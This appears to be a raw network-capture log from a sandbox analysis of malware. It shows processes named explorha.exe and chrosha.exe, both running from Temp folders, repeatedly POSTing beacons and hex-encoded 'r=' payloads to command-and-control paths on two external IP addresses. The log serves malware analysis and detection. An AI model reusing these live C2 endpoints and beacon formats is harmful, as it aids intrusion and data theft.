                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 314 | Source IP: 192.168.2.5 | Source Port: 50157 | Destination IP: 193.233.132.56 | Destination Port: 80 | PID: 4484 | Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp: Apr 19, 2024 03:31:25.079587936 CEST | Bytes transferred: 158 | Direction: OUT | Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:31:25.318634033 CEST | Bytes transferred: 219 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID: 315 | Source IP: 192.168.2.5 | Source Port: 50158 | Destination IP: 193.233.132.167 | Destination Port: 80 | PID: 8024 | Process: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp: Apr 19, 2024 03:31:25.428483009 CEST | Bytes transferred: 155 | Direction: OUT | Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:31:25.671046019 CEST | Bytes transferred: 197 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID: 316 | Source IP: 192.168.2.5 | Source Port: 50159 | Destination IP: 193.233.132.56 | Destination Port: 80 | PID: 4484 | Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp: Apr 19, 2024 03:31:25.567473888 CEST | Bytes transferred: 312 | Direction: OUT | Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:25.814826012 CEST  196                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
317         192.168.2.5  50160        193.233.132.167  80                8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:31:25.927284956 CEST  309                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:26.181022882 CEST  196                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
318         192.168.2.5  50161        193.233.132.56   80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:31:26.177280903 CEST  158                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:26.421849012 CEST  219                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
319         192.168.2.5  50162        193.233.132.167  80                8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:31:26.540323973 CEST  155                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:26.784744024 CEST  197                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
320         192.168.2.5  50163        193.233.132.56   80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:31:26.677582026 CEST  312                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:26.930562019 CEST  196                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
321         192.168.2.5  50164        193.233.132.167  80                8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:31:27.037194014 CEST  309                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:27.291599035 CEST  196                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
322         192.168.2.5  50165        193.233.132.56   80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:31:27.286633015 CEST  158                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:27.531101942 CEST  219                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
323 | 192.168.2.5 | 50166 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:27.645931005 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:27.889358044 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
324 | 192.168.2.5 | 50167 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:27.791291952 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:28.047936916 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
325 | 192.168.2.5 | 50168 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:28.146821976 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:28.403692007 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
326 | 192.168.2.5 | 50169 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:28.409729004 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:28.657990932 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
327 | 192.168.2.5 | 50170 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:28.765470982 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:29.016846895 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
328 | 192.168.2.5 | 50171 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:28.909379005 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:29.160451889 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
329 | 192.168.2.5 | 50172 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:29.271598101 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:29.523857117 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
330 | 192.168.2.5 | 50173 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:29.529052019 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:29.776853085 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
331 | 192.168.2.5 | 50174 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:29.883701086 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:30.128458977 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
